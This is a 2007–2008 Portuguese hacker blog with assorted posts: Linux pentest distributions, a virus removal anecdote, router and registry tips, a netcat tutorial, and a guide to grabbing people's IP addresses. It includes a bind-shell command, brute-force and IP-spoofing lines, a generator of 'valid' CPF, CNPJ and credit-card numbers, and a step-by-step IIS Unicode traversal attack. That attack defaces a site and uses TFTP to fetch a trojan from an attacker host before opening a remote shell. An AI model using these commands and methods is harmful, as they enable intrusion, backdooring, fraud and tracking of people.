♠♣~»Universo Hacker«~♣♠

Sistemas Linux Hackers. (S.O's)

2008-09-25T11:21:00.000-07:00

Linux Back Track.

Back Track é uma distribuição Linux live cd criado para hackers 89% são softwares hackers entre eles muitos programas para explorar falhas de segurança e invasões avançada para hackers
invasão rápida, firewall em 3 level...
BackTrack é uma distribuição focada em testes de penetração. Uma junção de duas antigas distribuições relacionadas com segurança, Whax e Auditor Security Collection, BackTrack reúne mais de 300 ferramentas de segurança, entre elas Kismet, Nmap, Etthercap, Wireshark, Nessus, Ethereal, e muitas outras !
Ele roda direto do cd, Rodei ele durante um mes em um Celeron D 315 2.26Ghz com 128 de ram e ele se mostrou muito leve e rápido perfeito.

Download:
ftp://mirror.switch.ch/mirror/backtrack/bt3-final.iso
______________________________________________

Linux Knoppix.
Sistema linux Criado com Base no Debian, para fins Hacker assim como o Back Track.
Ele desponibiliza muitas ferramentas hacker junto com o S.O

Download:
ftp://ftp.gtlib.gatech.edu/pub/knoppix-dvd/KNOPPIX_V5.1.1DVD-2007-01-04-EN.iso

Tutorial Removendo Virus Kavo.

2008-09-25T11:10:00.001-07:00

Galera.. quem aqui ja pego o virus Kavo....quem quem quem?
Eu ja...virus chato que nenhum A.V tira nem mesmo kaspersky bootavel..

Seguinte, o virus Kavo é um virus criado por netcat e uma ferramenta "inoscente" o winrar por exemplo. Esse virus nada mais serve de conexão direta entra seu computador e o do "hacker".
E o mais daora desse virus é que ele é indetctavel...sim sim por que não tem carcteristas Hex de um virus comum. Mas ao ser execultado, ele abre portas do seu pc e desativa firewall, Bloqueia o Gerenciador de tarefas, regedit (em alguns casos), que é encarado por muitos anti-vrus como um trojan e por outros virus vermes.

E ainda mais... ele pode se alojar em muitos outros lugares no meu caso system32. eu que fiz ele rsrsrsrsrs e eu mesmo me infectei.. mais o que eu não sabia é que "nada" conseguia exclui-lo.

ele cria mais 3 ou 4 arquivos com nomes similares a ele.. que são:

Kavo .exe;
tavo.exe;
kado.exe;
tav2.exe;

O mais legal desse virus é que nem com A.v e nem manualmente ele é excluido por que ele gera um registro no sistema de alto substituição, se ele e apagado é criado outro...e outro e outro. legal né...") que nada muito é trsite "(

Tentei de varias formas exclui-lo tirei ele da inicialização mais ele sempre iniciava, exclui pelo A.V e ele voltava,exclui por dos e ele voltava, em modo de segurança admin.. etc etc... ate por linux. e ele voltava. pesquisei no mestre (google) e nada depois de umas 4 horas de procura, achei um web page de busca similar ao do google e busquei.... busquei busquei.. umas 3 horas depois.. pimba! achei uma mateira em Arabe..¬¬ Oloko fiquei "mordido de raiva" no inicio mais depois de ver o site e a mateira.. tinha um link pra um tipo de killer... e por incrivel que pareça era um kavo killer. parecia akelas propagandas de ferramentas

"Seus problemas acabam".... e acabaram mesmo rsrsrsrsrs..

ele exclui compeltamente tanto os log's de inicialização como os .exe's criado por ele e exclui o registro de alto reposição. ")

milagre, milagre de Deus...e quero compartilhar iss com vc's.. e tipo o mais legal de tudo..é o seguinte. tinha gravado ele em cd e mais tinah perdido esse tal cd depois desse acotnecimento tive que formatar meu pc diverças vezes...
Estava arrumando minhas bagunças aki e achei esse CD e lembrei do meu enorme problema...

por isso desse tutorial xD.

aki esta o link aconselho deixa-lo no system32 para maior segurança tambem fazer uma copia dele em CD pen driver ou ate mesmo disquete.

http://www.badongo.com/file/10890979
(idioma: coreano ou outro ai que nem sei)

Execultando o Kavo_killer:

abra ele selecione todas as opções de esterminio;

clique na imagem do panda pegando fogo;

pronto. se não funcionar.. se mata por que é um metodo 100% valido.
testei em meu pc e em pc's de clientes meus.

tutorial: By the perfect

configurando modem D-LINK 500 G

2008-09-25T11:07:00.000-07:00

Me pediram para postar esse tuto e aqui esta.

D-LINK 500 G
D-Link 500G config ID Alta
No caso do Dlink 500G é assim:

Acesse o menu do modem pelo navegador Internet Explorer:

-No campo "Endereço" do navegador digite 10.1.1.1
-Digite o login e senha
-No menu da esquerda clique em "Services" e em seguida em "NAT"
-Na caixa "NAT Options" (no centro da tela), escolha a opção "NAT Rule Entry"
-Clique em "ADD"
-Preencha os campos a seguir com esses dados:

Rule ID: 2

Rule Flavor: RDR

IF Name: ALL

Protocol: TCP

Local Address From: 10.1.1.3 (esse geralmente é o IP da máquina se o seu for diferente troque)

Local Address To: 10.1.1.3

Global Address From: não coloque nada

Global Address To: não coloque nada

Destination Port From: 4662 (ou outra porta que você preferir, mas não esqueça de mudar no eMule também)

Destination Port To: 4662

Local Port: 4662

Clique em SUBMIT

Clique novamente em ADD e preencha outro:

Rule ID: 3

Rule Flavor: RDR

IF Name: ALL

Protocol: UDP

Local Address From: 10.1.1.3 (esse geralmente é o IP da máquina se o
seu for diferente troque)

Local Address To: 10.1.1.3

Global Address From: não coloque nada

Global Address To: não coloque nada

Destination Port From: 4672

Destination Port To: 4672

Local Port: 4672

Clique em SUBMIT

-Agora, no menu da esquerda, clique em "Admin" e em seguida
em "Commit & Reboot"

-Clique em "Save" (espere um minuto)
-Clique em "Reboot" (espere a tela atualizar, NÃO MEXA ersonName wt="on" ProductID="EM NADA DURANTE O">EM NADA DURANTE OersonName> REBOOT)

Verifique..

-Conexão Local
-Propriedades
-Protocolo TCP/IP

Marque a opção "usar o seguinte endereço IP" e coloque..

-Endereço IP: 10.1.1.3
-Máscara Sub-rede: 255.0.0.0
-Gateway padrão: 10.1.1.1

-Servidor DNS preferencial: 10.1.1.1
-Servidor DNS alternativo: em branco.

Pronto.!

Deixando o Acesso Remoto ou Rede mais Rapido.

2008-09-25T11:05:00.000-07:00

Essa dica e pra quem usa diariamente e com frequencia o acesso remoto e a Rede do Ruindows...¬¬

gilizando a procura por outros micros na rede
Caminho: Iniciar > Executar, digite “regedit” (sem aspas), pressione OK.
Vá em HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace
e procure pela chave {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Apague-a e pronto.
A visualização/navegação por outras estações da rede ficará mais rápida.

Mude o Texto do Internet Explorer

2008-09-25T11:03:00.000-07:00

O título “Microsoft Internet Explorer”, na barra superior do navegador pode ser substituido por qualquer outro título.

Para mudar ele então faça o seguinte:

1º Vá em Iniciar > Executar e digite: regedit

2º Já no editor do registro, navegue até este item:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

3º No painel da direita, verivique se existe um item chamado “Window Title”. Se não houver, clique em Editar > Novo > Valor da Sequencia para cria-lo. Um novo item irá aparecer. Escreva nele o nome Window Title.

4º Agora dê um duplo clique nesse item, e na caixa ”Editar Sequencia”, digite o título de sua preferência no campo “Dados do Valor” e clique em OK.

5º Agora feche todos Internet Explorer’s que estiverem aberto e abra novamente para ver o resultado.

Entrar no Firefox com 2 contas de Orkut, blooger etc.

2008-09-25T11:00:00.000-07:00

Estou postando...mais não sei se é o único jeito.

Vá até o iniciar>Executar;
Digite:
firefox -p -no-remote.

E Dê enter;
Vai aparecer uma janelinha;
Clique em Novo Perfil;
Crie;
Clique nele e em iniciar o Firefox.

Ira abrir outro firefox com o perfil que você criou.

Deixando IP fixo pelo DynDNS

2008-09-15T09:32:00.000-07:00

Ola galera quanto tempo.....")
Bom postarei Hoje como deixar o ip fixo pelo DynDNS.

primeiramente, entre na pagina:
http://www.dyndns.com/support/
e baixe o programa a sua direita da pagina... logo clique nesse link:
Create Account

Criando conta:

__User Information____

Username: (nome);
Email Address: (endereço de email);
Confirm Email Address: (novamente o endereço de email);
Password: (Senha da sua conta);
Confirm Password: (novamente a senha da sua conta).

__About You (optional)____

Não necessário informar nada.

__Terms of Service____

Marque as 2 "caixinhas"

__Mailing Lists (optional)____

Marque as 3 "caixinhas"

e depois Create Account.
Automaticamente sua conta sera criada... va no seu email (o que voce registrou a sua conta DynDNS) e clique no link de ativação.
_________________________.

Criando Host:

Depois de ativar sua conta e logar com ela, va em My Services e logo depois em Host Services.
Logo depois em Add New Hostname.

Hostname: (Nome do host.Dominio.org) Sugiro dominio com .Org;
Wildcard: (marca esta opção);
Service Type: (marque a opão Host with IP address para IP fixo);
Host with IP address: ( clique em Use Auto Detected...);
Mail Routing: (marque esta opção).

Create Host.
_______________________.

instale o programa, e use a sua conta criada no DynDNS usando o nome e senha.
Marque a Caixinha da opção do seu Host no programa.

E Pronto....")

By: The Perfect.!

instalando Linux (HD Sata)

2008-06-22T10:42:00.000-07:00

Iae galera... desculpa a ausencia ai... voltei pra dar umas dicas sobre o sistema linux que nomeu ver é o melhor e mais completo sistema ja feito....

Muita gente Fica louca creba o pc bate na irmã quando se fala em instalação do sistema linux em HD Sata.
Primeiro por que os linux não dão suporte a HD's Satas mas.... não se preoculpe.

Baixe o Linux Satux 1.6 no site oficial:

http://www.satux.org.br/

depois de baixa-lo grave em uma media de DVD, fassa um backup dos seus arquivos pois ele apagara tudo que estiver em seu HD ate mesmo seu windows, logo depois ensira o disco na unidade de CD Rom/DVD e reinicie o seu PC

Certifique-se configurou para dar boot no CD caso não tenha feito quando estiver reiniciando aperte del até ir para o setup da placa mae va na opção de boot e mude a opção para CD Rom. salve e reinicie novamente, altomaticamente ele vai ler o DVD e vai iniciar o boot.

Sigua os passos de instalação e epsere ele formatar seu HD sata de NTFS para EXT3 depois disseo ele instalara o sistema satux.

pronto. é só desfrutar do linux em seu HD sata.

OBS.: caso termine a instalação e de erro de scren boot ou image Boot reinsta-le comigo aconteceu isso mais optei por ouyto linux o Big linux.
Na instalção de qualquer linux escolha a opção de instalação do grub ou lilo na MBR

Curiosidade.: quando o satux acha seu HD e formata de NTFS apra ext3 ele permite a instalação de qualquer outro linux. fassa um teste instale o satux pegue o CD do Kurumin 7 ou o NG 8.04 e formate a partição ext3 e instale um desses Kurumin's ou outro linux de sua preferencia.

Bom galera achu que é só isso.... flw e ate mais...

viva a linux....xD

NetCat

2008-02-11T16:03:00.000-08:00

ola glera... desculpe a ausencia... vi que me pediram o NetCat e to aki postando ele....

ta ai..... o tutorial e logo abaixo o link do download do NetCat

Tutorial

para começar

$ nc -h

-e "comando" .:[ Executa o comando especificado usando como entrada (stdin) os dados recebidos pela rede e enviando os dados de saída (stdout e stderr) para a rede. Essa opção somente estará presente se o nc for compilado com a opção GAPING_SECURITY_HOLE, já que permite que usuários disponibilizem programas para qualquer um conectado a rede. ]:.

-i .:[ Especifica o intervalo de tempo no qual as linhas de texto serão enviadas ou recebidas. ]:.

-l .:[ Coloca no netcat em estado de escuta (listening) ]:.

-L .:[Coloca no netcat em estado de escuta (listening), reiniciando o netcat com a mesma linha de comando caso a conexão feche ]:.

-n .:[ Força o netcat a usar apenas endereços de IP numéricos, sem fazer consultas a servidores DNS; ]:.

-o "filename" .:[ Usando para obter um log dos dados de entrada ou saída, em formato hexadecimal; ]:.

-p .:[ Especifica a porta a ser usada, sujeito a disponibilidade e a restrições de privilégio; ]:.

-r .:[ Faz as portas do portscan serem escolhidas aleatóriamente; ]:.

-s .:[ Especifica o endereço IP da interface usada para enviar os pacotes. Pode ser usado para spoofing de IPs, bastando apenas configurar uma interface do tipo eth0:0 (usando o ifconfig) com o IP desejado; ]:.

-t .:[ Permite usar o nc para criar sessões de telnet por script. Precisa estar compilado com a opção -DTELNET; ]:.

-u .:[ Usar UDP ao invés de TCP ]:.

-v .:[ Controla o nível de mensagens mostradas na tela; ]:.

-w .:[ Limita o tempo máximo para que uma conexão seja estabelecida; ]:.

-z .:[ Para evitar o envio de dados através de uma conexão TCP, e limitar os dados de uma conexão UDP. ]:.

É muito importante lembrar que comandos e sintaxes do Linux podem ser misturadas, assim como a utilização de pipes( ), <, > e >>.

Veremos agora, a versatilidade e utilização dos comandos em ação, ou seja a mão na massa:

1- Conectando-se a um host
É feita da mesma maneira que o telnet. É especificado apenas um host e a porta a se conectar.
Exemplos:
$ nc mail.yahoo.com.br 110
$ nc www.uol.com.br 80

Lembrando que a porta 110 é dos servidores de POP3 e a 80 é de servidores web.

2- Abrindo uma porta (listenning)
É utilizada a sintaxe -l para colocar em listenning e -vv para retornar eco com detalhes.
A seguir é estipulada a porta:
$ nc -l -p 53 -vv

Será retornada uma mensagem: "listenning on [any] 53 ... "

3- Transferindo Arquivos

Transferir arquivos de um host para outro usando o netcat é bastante simples. Basta configurar o lado server (que vai receber o arquivo) para "escutar" uma porta específica e redirecionar todos os dados recebidos para um arquivo. Colocando-se um timeout, o servidor irá perceber quando não existem mais dados chegando e irá fechar a conexão.
No lado cliente da conexão, simplesmente conecta-se à porta do servidor e passa-se o arquivo a ser tranferido como entrada.

Servidor:
$ nc -vvn -l -p 3000 -w 30 > file
Listening on any address 3000

Cliente:
$ nc -vvn -w 2 10.0.0.1 3000 <>

O servidor irá mostrar a seguinte mensagem quando uma conexão for estabelecida:
Connection from 10.0.0.1:1028

Novamente, a conexão deve ser terminada usando-se o CTRL-C. O servidor irá mostrar:
Exiting.
Total received bytes: 6
Total sent bytes: 0

Enquanto que o cliente mostrará:
Total received bytes: 0
Total sent bytes: 6

4- Escaneando portas
Será feita uma tentativa de conexão à um IP ou host e será estipulada as portas da tentativa de conexão:
$ nc -vv www.qualquer_site.com.br 110 80 139
$ nc -vv www.qualquer_site.com.br 1-10000

No primeiro exemplo serão escaneadas apenas as portas 110 (POP3), 80 (web) e 139 (compartilhamento do Windows). Já no segundo exemplo serão escaneadas desde a porta 1 até a 10000. (range port de 1-10000)

5- Abrindo a porta, dando acesso a uma "shell" .:[ Trojan ]:.
Será colocada a porta X em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador. Funciona de forma semelhante a um trojan.
$ nc -l -e /bin/bash -p 2332

Nesse caso acima quem se conectar à máquina na porta 2332 terá acesso irrestrito nela.

6- Usando como brute-force
Comando:
$ nc -vv 79 < ~/wordlists.txt > bruteforce_OK.log

Note que conectaremos a porta do FINGER(79) e redirecionaremos o conteúdo do arquivo wordlists.txt para essa porta. Quando algum resultado for válido ele será salvo em bruteforce.log para uma análise posterior dos resultados.
Lembrem-se, ssh ele dropa e faz LOG das conexões após três tentativas de conexão. Então muito cuidado ao usar o brute force.

7- Fazendo um sniffer
Além de tudo isto demonstrado acima, o Netcat ainda pode capturar todo o tráfego de uma rede. Iremos nos conectar a uma porta e mandar o netcat "dar eco" nela, ou seja, exibir TUDO o que passa por ela. Após isso, é só redirecionar tudo o que o Netcat gravou para um arquivo.
Veja o comando, para melhor compreensão:
$ nc -vv -L 127.0.0.1 -p 80 > ~/sniffing.log

Nesse caso todos os dados que passarem pela porta 80 da sua máquina (127.0.0.1) será gravado no arquivo sniffing.log

8 - IP Spoofing
Usando o netcat, você pode fazer inclusive spoofing de endereços IP. Se você estiver escutando o tráfego em um segmento, você pode enviar esse tráfego para outro host usando o protocolo UDP.
O comando deverá ser tipo:

$ tcpdump -l -xX -vvv -tttt | nc -u -s spoofed_ip listener_ip

Isso também requer que você configure o endereço IP spoofed para um alias na sua interface de rede:

$ ifconfig eth0:N spoofed_ip

Link para download:

download

(versão para Windows)

"error" C:\windows\system

2008-01-15T19:10:00.000-08:00

Oi galera quem de vocês ja passaram por esse error ai no seu windows então descobri um metodo de você fazer uma recuperação sem presisar formatar o pc ok.

Inicio

Para acessar o Recovery Console efetue boot com o CD de instalação do Windows XP Professional, e siga as etapas abaixo:

1. Inicie o computador com o CD de instalação do Windows XP Professional e siga as instruções na tela.

2. Na tela Welcome to Setup, selecione R para reparar uma instalação do Windows XP Professional existente. Como mostra a figura 1.1.

Figura 1.1

3. A próxima tela mostra todos os sistemas operacionais instalados, selecione a instalação do sistema operacional que você deseja recuperar.

4. Uma tela de prompt de comando será exibida, no prompt da pasta de instalação do Windows XP Professional. Como mostra a figura 1.2. ( na guia aonde fala para perta enter para cancelar vc digita o numero 1 e da um enter)

5. Digite a senha do Administrator (Administrador) e pressione Enter. (caso tenha, é normal que não tenha se você não tem certeza da um enter normal se der erro é por que logicamente tem uma senha na conta admin)

6- chegando em C:\windows> vc digitara BOOTCFG e dara um enter feito isso ele vai fazer fazer um processo terminando todo o processo é s´digitar exit ou sair, e reiniciar o seu Pc (caso não reinicia sozinho)

Figura 1.2

Nessa tela você pode usar todos os comandos relacionados na tabela abaixo, para reparar uma instalação do Windows XP Professional.

Veja abaixo os comandos que você pode usar com o Recovery Console:

Comando	Descrição
Attrib	Altera os atributos de um arquivo ou pasta.
Batch	Executa os comandos especificados no arquivo de texto.
Bootcfg	Configuração e recuperação do arquivo de inicialização (boot.ini).
ChDir (Cd)	Exibe ou altera o nome da pasta atual.
Chkdsk	Verifica um disco e exibe um relatório de status.
Cls	Limpa a tela.
Copy	Copia um único arquivo para outro local.
Delete (Del)	Exclui um ou mais arquivos.
Dir	Exibe uma lista de arquivos e subpastas em uma pasta.
Disable	Desativa um driver de dispositivo ou serviço de sistema.
Diskpart	Gerencia partições nos discos rígidos.
Enable	Inicia ou ativa um driver de dispositivo ou serviço de sistema.
Exit	Sai do Console de recuperação e reinicia o computador.
Expand	Extrai um arquivo de um arquivo compactado.
Fixboot	Grava um novo setor de inicialização de partição na partição especificada.
Fixmbr	Repara o registro de inicialização mestre do disco especificado.
Format	Formata um disco.
Help	Exibe uma lista de comandos que você pode usar no Console de recuperação.
Listsvc	Lista os serviços e drivers disponíveis no computador.
Logon	Faz logon em uma instalação do Windows.
Map	Exibe os mapeamentos da letra de unidade.
Mkdir (Md)	Cria uma pasta.
More	Exibe um arquivo de texto.
Net use	Conecta um compartilhamento de rede a uma letra de unidade.
Rename (Ren)	Renomeia um único arquivo.
Rmdir (Rd)	Exclui uma pasta.
Set	Exibe e define variáveis de ambiente.
Systemroot	Define a pasta atual como a pasta systemroot do sistema ao qual você está conectado no momento.

ta ai galera espero ter ajudado esse metodo ai eu mesmo testei e aprovo por que não sei o que deu aki nessa merda que deu esse mesmo erro e fiz tudo isso e deu sertinho não perdi nem se quer os itens que estava a lixeira.

Obs: cuidado com os codigos que vc digitara no console só digita o bootcfg e termine a execução.
em relação a senha a maioria não tem senha de admin caso tenha senha e você não saiba qual é entre em contato com quem te forneceu a maquina ou quem formatou pra você.

Temas para Windows Xp

2008-01-10T18:42:00.000-08:00

Temas Para o Windows XP

Galera é facil..só instala o programinha baixa os temas ai.. e clica 2 vezes em siam dele ele va iabrir o programinha que tu instalo depois é só ir la em baixo em install e ja era....

xD..

Clique aqui
e baixe o TuneUP

Não é necessário
registrar o programa para instalar os tema, no prazo de 15 dias, e
depois de instalado, os temas não expira. Experiência comprovado por
mim Cleiton ET HACKER, em 02/11/2007

O
programa é tão simples, tudo em um passe de Mágica você ficará com
uma interface personalizada e bem próxima do Vista!

Após instalar o programa
TUNEUP acima, e com ele aberto baixe os estilos abaixo no seu
computador com o programa aberto, procure configure o TUNEUP e
pronto!

Bott Screen - É
aquela imagem que aparece quando você liga o computador, "aquela que
aparece carregando windows" abaixo temos alguns exemplos, mas saiba
que se quiser pode colocar até sua foto. Fica Show!

6º Agora a tela
de boas vindas do windows a que você coloca o login e senha se
tiver!

Gerador de CPF e CNPJ

2008-01-08T17:43:00.000-08:00

iae galera.... vo ta postando aki uma pagina que eu criei com geradores de CPF CNPJ telefones residenciais e comerciais, cartões de creditos, e CEP's e ruas... e tudo valido! isso mesmo valido a pagina esta em construção.. então quando terminar postarei aqui ok.

flw galera.

Opa ta aki a pagina que eu fiz ai.. só não consegui funfa legal o gerador de cartões mais o resto ta blz.....flw.

clique aqui

ta ai galera é só fazer um bom uso...

Pegando IP 4 maneiras

2007-12-14T15:50:00.000-08:00

Bom é muito simples e pratico da para se pegar um ip

ai vão algumas formas simples.

PELO MSN MESSENGER:

-Para pegar ip dos seus contatos no MSN você precisa
ter uma conexão direta com a vítima,
por exemplo, mande um arquivo pra vítima,
e na hora da transferência você abre o DOS e digita NETSTAT -N,
aí vai aparecer uma lista de ips,
o da vítima será o último da lista..

Outro metodo pelo MSN é um plugins... esse plugins é responsavel pelo agendamento dos ip's dos seus amigos.. facil de configurar... melhor nem presisa configurar é só instala e pronto. Lembrando que Você presisa do plugins do msn..aquele que todo mundo usa. O nome do plugins responsavel pelo agendamento dos ip's é ipGet.

PEGAR IPs em salas de chat

Bom existe o comando ARP -A ele dá o IP de qualquer computador que vc esteja se comunicando primeiro vc escolhe o LAMMER...daí vc nem fala mais com ninguém só com ele...
pq senão vai aparecer o IP duma galera e vc vai ficar bem embolado sem saber de quem são os IP'S
depois de escolhido o lammer vá ao prompt do MS-DOS e digite:
ARP -A
Vai aparecer umas parada assim....

Interface: aqui_vai_aparecer_o_teu_ip

Internet Address Physical Adress Type

Aqui_vai_aparesser_o_ip_do_cara
Endereço_physical Aqui o tipo do IP dinâmico ou fixo...

PEGAR IPs ATRAVES DE EMAILs

è possivel pegar diversas informações em um e-mail, e alterando pequenas informações no hotmail é possivel pegar o ip de otra pessoa entre otras informações

Primeiramente clike em "OPÇÔES" no canto superior direito da pagina inicial de sua conta do hotmail.
Logo apos clike em "CORREIO" logo apos em "CONFIGURAÇÃO DE EXIBIÇÃO DE MENSAGENS".
O proximo passo é localizar "CABEÇALHO DE MENSAGENS" em seguida, marque a opção "AVANÇADA". logo apos clike em "OK"

pronto e a cada e-mail ke vc receber procure pela palavra "X-originating-IP:xxx.xxx.xxx.xxx"

Bom divertimento!!

+ Dicas para invadir servidores

2007-12-13T09:47:00.000-08:00

Todas as dicas contidas nesta
área são totalmente de sua responsabilidade, estão aqui apenas com o intuito de
trazer as informações para que vocês internautas tenham um conhecimento além do
normal e saiba como se defender na internet, portanto eu não me responsabilizo
por qualquer ato imbecil que você venha a fazer com as informações aqui
contidas.

Tentaremos aqui desenvolver um paper explicando
passo-à-passo de como um "hacker" faz para obter acesso num servidor rodando
WindowsNT Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal
vulnerável e como corrigir essa vulnerabilidade.

Obs: esta
técnica já é bem
velhinha

Segue abaixo as versões dos
Sistemas Operacionais e Programas Vulneráveis.

::Vulnerável:

::Microsoft IIS 5.0

+Microsoft Windows NT 2000

::Microsoft IIS 4.0

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.5

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.0

- Microsoft Windows NT 4.0

Vamos ao que interessa

INDICE

1º Procurar por um host vulnerável.

2º Testar se o host é realmente vulnerável.

2.1 Fazer um scanner no host alvo.

2.2 Testar o exploit no host alvo antes mesmo de verificar se ele está
vulnerável ou não.

3º Listar os arquivos e pastas contidos no servidor vulnerável.

4º Alterar o conteúdo do site do host vulnerável.

5º TÉCNICAS DE HAXORS. ;-)

6º AGORA VOCÊ É UM HACKER. OU NÃO?

7º MAIS EXPLOITS.

8º CORREÇÃO.

1º) Procurar por um host
vulnerável

Geralmente os hosts mais
procurados são os mais conhecidos, como sites do governo e empresas
nacionalmente e mundialmente conhecidas. Mas se você quer dar uma de "hacker"
pegue uma hp bem fulerinha..

2º) Testar se o host é
realmente vulnerável.

Existem duas maneiras básicas.

2.1 Fazer um scanner no host
alvo.

Existem scanners que vasculham
servidores e serviços que estão sendo executados. Esses scanners verificam se há
algum serviço vulnerável, que ainda não foi corrigido. Para testar essa
vulnerabilidade existem scanners tanto para windows quanto pra linux.

Para windows você pode obter o

SSS - Security Shadow
Scanner (já vem com seu crack dentro do .zip)

Para linux um scanner feito perl que quando encontra um HOST vulnerável ele
inidica o url de onde pode-se obter o exploit para explorar essa
vulnerabilidade.

Segue abaixo como usá-los:

- SSS (Security Shadow Scanner)
Não há mistério de como utilizá-lo. Basta preencher o campo com o IP ou HOST do
alvo e iniciar o "scanneamento". Quando encontrar ele colocará em vermelho um
aviso dizendo que o HOST está vulnerável ao msdac.dll.

- unicheck.pl - Veja o que
acontece quando ele acha um HOST vulnerável.

perl unicheck.pl XXX.XXX.XXX.XXX:80

- Pode ver que ele avisa que o host é vulnerável. THIS HOST IS VULNERABLE :-).

Avisa onde encotrar o exploit para explorar a vulnerabilidade.
http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl

2.2 Testar o exploit no host alvo
antes mesmo de verificar se ele está vulnerável ou não..

Agora iremos testar o exploit no
nosso host alvo.

"dir c:inetpub"

Como pode ver acima, foi listado os diretórios dentro do diretório c:inetpub.
Assim o "hacker" tem acesso à todo o seus arquivos, podendo assim alterar o site
da empresa que infelizmente não tem uma equipe separada da equipe de
administração responsável pela segurança da empresa, que não só se limita à
segurança virtual. Como o "hacker" pode ler o diretório "c:inetpub" ele também
pode ter acesso ao diretório padrão do website "c:inetpubwwwroot" ou outro
diretório que hospeda os arquivos do site da empresa como pode ver abaixo.

3º) Listar os arquivos e pastas
contidos no servidor vulnerável.

Iremos listar todos os arquivos e
diretórios dentro de uma determinada pasta.>

perl xpu.pl www.host-alvo.com.br:80 "dir c:inetpubwwwroot"

4º) Alterar o conteúdo do site
do host vulnerável.

perl unicodexecute.pl www.host-alvo.com.br:80
''echo SITE HACKED BY Remote Menace!! > c:\inetpubwwwroot\index.htm''

Pronto... agora você alterou o site da empresa que encontrou vulnerável. Quando
for acessar o site da empresa que encontrou vulnerável você encontrará a
seguinte mensagem no site:

" SITE HACKED BY Remote Menace! "

É assim que praticamente o mundo inteiro está sendo invadido. :-)

5º) TÉCNICAS DE HAXORS

Bom..

. agora varia de pessoa para pessoa, conheceimento para conhecimento,
criatividade para criatividade. O jeito de como você pode obter maiores
informações a partir da exploração da vulnerabilidade do unicode só dependerá de
você.

Para adiantar o seu lado, vamos adiantar alguma coisa. Com o acesso já garantido
ao servidor você poderá fazer o que bem entende. Geralmente os "hackers" do
Brasil se contentam em alterar a pagina e esquecer de "backdoorizar" as máquinas
que eles conseguem invadir. De certa forma isso é muito bom, pois o que parece é
que eles querem somente manifestar o seu descontentamento com o governo e a
administração que o Brasil tem. Não que isso seja certo ou que concordamos com o
que eles fazem. Infelizmente as pessoas ainda não tem conhecimento do que
acontece e o que realmente é o underground e mesmo o que é um HACKER no sentido
profundo.

Para você obter um maior acesso à
rede, ou seja, conseguir acesso à outras máquinas, outros tipos de acessos,
abrir um terminal remoto e até mesmo continuar tendo acesso à máquina, você
precisa fazer algumas coisas, mesmo porque o servidor não ficará vulnerável para
sempre.

Você pode utilizar ferramentas que já vem instaladas por default (padrão) no
Windows NT e 2000 para "facilitar" a sua vida. A dica que daremos aqui é
utilizar o TFTP para poder abrir um terminal remoto posteriormente e continuar
tendo acesso à máquina mesmo depois de sua correção.

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"

+ip.de.onde.esta.o.trojan+GET+trojan.exe+c:\winnt\system32\trojan.exe

.

agora rode o trojan com:

/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe

Bom...

Agora você instalou o nc no servidor, poderá abrir um terminal remoto no Windows
NT, tendo acesso completo ao sistema.

Como foi dito antes, depende de você continuar tendo acesso ao servidor. E essas
técnicas estão sendo aprimoradas a cada dia. Você acha que pode conseguir ter
acesso ao arquivo SAM? Você pode descriptografar as senhas dos usuários? Você
pode utilizar o terminal que você abriu e tentar ter acesso à outras máquinas
para não haver um reastreamento direto para sua máquina?Você pode conseguir
acesso à rede interna (10.0.0.0 por exemplo) se houver? Você pode sniffar a rede
a partir dessa máquina e obter acesso às outras máquinas?

Como pode ver... pode se fazer MUITA coisa além de modificar uma página apartir
de um bug que CENTENAS de servidores ainda continuam vulneráveis por todo o
mundo.

6º) AGORA VOCÊ É UM HACKER. OU
NÃO?

Você se considera um hacker?

Bom...

7º) MAIS EXPLOITS.

Mais exploits:

iis-zang.c

iis-zang.exe

iis-zang.obsd

iis-zang.linux

unicodecheck.pl

unicodexecute.pl

unicodexecute2.pl

8º) CORREÇÃO.

Contratar um Security Officer
para cuidar da segurança da sua empresa.

Se manter o mais atualizado possível.

Internet Informatio Server 4.0

http://www.microsoft.com/ntserver/nts/downloads/

Internet Informatio Server 5.0

http://www.microsoft.com/ntserver/nts/downloads/

Apostila: Ciências da Computação.

2007-12-11T08:52:00.000-08:00

Ae galera apostila boa aqui pra vocês... ela tem tudo que o tema ciências da coputação aborta com desenhos exemplos e perguntas, isso mesmo um pequeno "quest" para Vocês testrem seus conhecimentos nas diversas areas.

O que a Apostila Abranje

Administração em Informática
Analise de Sistemas
Básico de Redes
Educação Física
Gerenciamento de Projeto para Desenvolvimento de Sistema
Linguagem Técnina de Programação
Modelagem de Dados
Sistemas de Computação
VB
Administração Geral
Banco de Dados I
Banco de Dados II
Engenharia de software
Internet
Matemática I
Projeto de Sistemas I
Projeto de Sistemas II
Análise de Projeto de Sistemas I
Sistemas Operacionais
Delphi
Estrutura de Dados
Introdução à Programação
Microinformática
Curso Básico de Lógica de Programação
Tópicos Avançados em Programação

Download da apostila:

clique Aqui

By: The Perfect

Entendendo ZINE e Fazendo sua propria

2007-12-10T14:47:00.000-08:00

ESSA ZINE É PRIVATE, NÃO DISTRIBUA!!!!!PRIV8 = DO NOT DISTRIBUTE

# ###### # # ###### # # # # # # # # # # # # # # # Os últimos suspiros de um nick que só # ###### # # ###### # # # # me deu alegria aheuaheua. # # # # # # # # # # # # # # # # # # # # # # ##### # # # # # ###### ###### # r0x a lot
Texto: D1C45 Autor: The_Perfect
Introdução--------------------------------------The PerfectPDW ------------------------------------------- The perfectproxy-------------------------------------------The perfectSQL Injection ----------------------------------The perfectRPC --------------------------------------------The perfectPHPwebsite--------------------------------------The perfectdDos--------------------------------------------The perfectNetbios ----------------------------------------The perfectCGI --------------------------------------------The perfecrYABBSE.php--------------------------------------The perfectBug para carders--------------------------------Hualdo (Shadow Boys)Usando o Google como scanner--------------------Hualdo (Shadow Boys)Banco de dados----------------------------------The perfect, Hualdo (Shadow Boys)
################# #INTRODUÇÃO (UI)# #################
Muito bem, se você decidiu ler essa zine é porque acha que tem mais a aprender, e isso é bom.
